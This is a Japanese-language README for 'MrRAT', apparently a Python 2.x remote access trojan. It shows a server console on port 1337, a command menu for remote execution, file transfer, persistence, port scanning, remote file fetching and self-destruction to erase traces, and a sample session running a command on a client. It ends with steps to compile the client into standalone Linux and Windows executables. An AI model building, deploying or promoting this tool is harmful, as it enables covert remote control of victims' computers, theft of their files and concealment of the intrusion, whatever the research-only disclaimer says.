
🐭 これはクロスプラットフォームのPython 2.xリモートアクセス型トロイの木馬(RAT)です。
これはクロスプラットフォームのPython 2.xリモートアクセス型トロイの木馬(RAT)です。MrRATは、クリーンな設計を保ちつつフル機能を備えたPython RATとして作成されました。現在は開発途中であり、依然として活発に開発が続けられています。
免責事項: このRATは研究目的のみであり、許可されたシステムでのみ使用してください。許可や明示的な同意なしにコンピュータシステムやネットワークにアクセスすることは違法です。
$ python MrRAT_server.py --port 1337
/$$ /$$ /$$$$$$$ /$$$$$$ /$$$$$$$$
| $$$ /$$$ | $$__ $$ /$$__ $$|__ $$__/
| $$$$ /$$$$ /$$$$$$ | $$ \ $$| $$ \ $$ | $$
| $$ $$/$$ $$ /$$__ $$| $$$$$$$/| $$$$$$$$ | $$
| $$ $$$| $$| $$ \__/| $$__ $$| $$__ $$ | $$
| $$\ $ | $$| $$ | $$ \ $$| $$ | $$ | $$
| $$ \/ | $$| $$ | $$ | $$| $$ | $$ | $$
|__/ |__/|__/ |__/ |__/|__/ |__/ |__/
, .
(\,;,/)
(o o)\//,
\ / \,
`+'( ( \ )
// \ |_./
'~' '~----'
https://github.com/user696/MrRAT
MrRAT server listening for connections on port 1337.
[?] MrRAT> help
client <id> - Connect to a client.
clients - List connected clients.
download <files> - Download file(s).
execute <command> - Execute a command on the target.
help - Show this help menu.
kill - Kill the client connection.
persistence - Apply persistence mechanism.
quit - Exit the server and end all client connections.
scan <ip> - Scan top 25 ports on a single host.
selfdestruct - Remove all traces of the RAT from the target system.
survey - Run a system survey.
unzip <file> - Unzip a file.
upload <files> - Upload files(s).
wget <url> - Download a file from the web.
[?] MrRAT> clients
ID - Client Address
1 - 127.0.0.1
[?] MrRAT> client 1
[1] MrRAT> execute uname -a
Linux sandbox3 4.8.13-1-ARCH #1 SMP PREEMPT Fri Dec 9 07:24:34 CET 2016 x86_64 GNU/Linux
ビルドする前に、MrRAT_client.py の先頭にある HOST 変数と PORT 変数を、自分のニーズに合わせて変更する必要があることに注意してください。
Linuxでは、Python 2.x、PyInstaller、pycrypto が必要です。次に、pyinstaller2 --onefile MrRAT_client.py のように実行すると、スタンドアロンのELF実行可能ファイルを含む dist/ フォルダが生成されるはずです。
Windowsでは、Python 2.x、PyInstaller、pycrypto、pywin32、pefile が必要です。次に、C:\path\to\PyInstaller-3.2\PyInstaller-3.2\pyinstaller.py --onefile MrRAT_client.py のように実行すると、スタンドアロンのPE(ポータブル実行可能ファイル)を含む dist/ フォルダが生成されるはずです。